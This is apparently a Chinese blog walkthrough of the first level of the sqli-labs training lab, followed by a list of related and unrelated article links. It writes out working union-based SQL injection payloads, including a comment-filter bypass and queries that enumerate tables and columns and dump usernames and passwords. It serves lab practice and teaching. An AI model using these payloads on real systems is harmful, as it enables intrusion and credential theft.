文章目录

  • 判断注入类型
  • 开始注入

判断注入类型

首先判断是什么类型的注入,这里是字符型的:

1' and '1'='1   //正常
1' and '1'='2  //错误

开始注入

末尾的注释符#被过滤,所以报错了:

URL编码绕过,列长度为3:

爆注入点:

'union SELECT 1,2,3%23

爆表名:

http://192.168.1.113:86/Less-1/?id='union SELECT 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())%23


爆列名:

http://192.168.1.113:86/Less-1/?id='union SELECT 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')%23


爆字段内容:

http://192.168.1.113:86/Less-1/?id='union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23

第一关嘛,都是常规操作,这里的0x3a就是一个;只不过用16进制表示了,为了区分一下账号和密码,增加可视化。

这个exp后面会经常用到,这样好处是可以更直观的反映出它过滤了什么,相对于上一关加了什么防护或者有什么变化,坏处自然就是手懒了一些。

exp:union SELECT 1,2,(select group_concat(username,0x3a,password) from users)%23

sqli-labs系列——第一关相关推荐

  1. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

    第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

  2. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  3. SQLi LABS Less 26a 联合注入+布尔盲注

    第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...

  4. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  5. SQL注入之时间盲注 和 报错注入(sql-lab第一关为例)

    什么是时间盲注 时间盲注指通过页面执行的时间来判断数据内容的注入方式,通常用于数据(包含逻辑型)不能返回到页面中的场景,无法利用页面回显判断数据内容,只能通过执行的时间来获取数据. 时间盲注的过程 1 ...

  6. SQL注入之union联合注入——sql-lab第一关(非常非常详细的过程)

    SQL注入介绍 什么是SQL注入: SQL注入是(SQLi)是一种注入攻击,可以执行恶意的SQL语句,它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制web应用程序后面的数据库服务器.攻击者 ...

  7. qt 3d迷宫游戏_Steam上最硬核的恐怖游戏?玩家耗时一个月才通第一关!

    说到恐怖游戏,游戏日报漆木第一时间想到的便是<逃生>系列.<层层恐惧>.<寂静岭>等.他们的共同特点无非就是恐怖,但难度都比较适中,主要体现在解密方面.而今天为大家 ...

  8. 因果分析系列6--相关,回归与因果

    因果分析系列6--相关,回归与因果 相关与因果 相关与回归 回归与因果 回归理论 非随机数据的回归分析 相关,回归和因果这些是统计和机器学习中经常提到的一些术语,它们均可通过观测数据定义定义不同变量之 ...

  9. 2023春节祝福系列第一弹(上)(放飞祈福孔明灯,祝福大家身体健康)(附完整源代码及资源免费下载)

    2023春节祝福系列第一弹(上) (放飞祈福孔明灯,祝福大家身体健康) (附完整源代码及资源免费下载) 目录 一.前言 二.一片星光闪烁的旋转星空 (1).效果展示: (2).相关源代码 (3).语法 ...

最新文章

  1. 【十问十答】粒子群算法(PSO)
  2. 2.Android的学习(Android的环境搭建)
  3. PyTorch:MNIST数据集手写数字识别
  4. 使用CDN引用jQuery
  5. 安装 pptpd 服务
  6. 面经——嵌入式芯片底层
  7. CentOS7搭建本地yum源之http服务
  8. ISO 2768-2 标准
  9. [K.O.]安装iTunes提示此Windows Installer软件包有一个问题…!
  10. 不引入外部文件也可以显示图片
  11. Vue 微商城项目(一)
  12. 【tableau小白进阶之路】多度量折线图制作 时间轴制作
  13. Android权限申请之动态申请权限
  14. 2022-2028全球与中国实验室烧结炉市场现状及未来发展趋势
  15. 当程序员遇到会写代码的产品经理......
  16. xcode生成文件路径
  17. 如何用微信截图鼠标右键菜单的内容
  18. 生日没给女友送礼物,如何用 Python 哄女票开心
  19. 5月英语总结-Reading English Books
  20. 读文章笔记-自适应和加速GB生成算法

热门文章

  1. 广西民族大学相思湖学院计算机考试,广西民族大学相思湖学院教务处,教务管理系统...
  2. Manjaro重启出现failed to start pkgfile database update
  3. Wins10系统忘记开机密码快速解锁方法(图文教程)
  4. 磁盘空间不足怎么办?教你重新分配磁盘空间
  5. python蓝桥算法提高
  6. python-django的JsonResponse返回中文数据编码问题
  7. 【机器学习的Tricks】随机权值平均优化器swa
  8. 便利的无线信号传输解决方案
  9. 找一个程序员男/女朋友 程序员怎么可能没对象
  10. 10.4.变态跳楼梯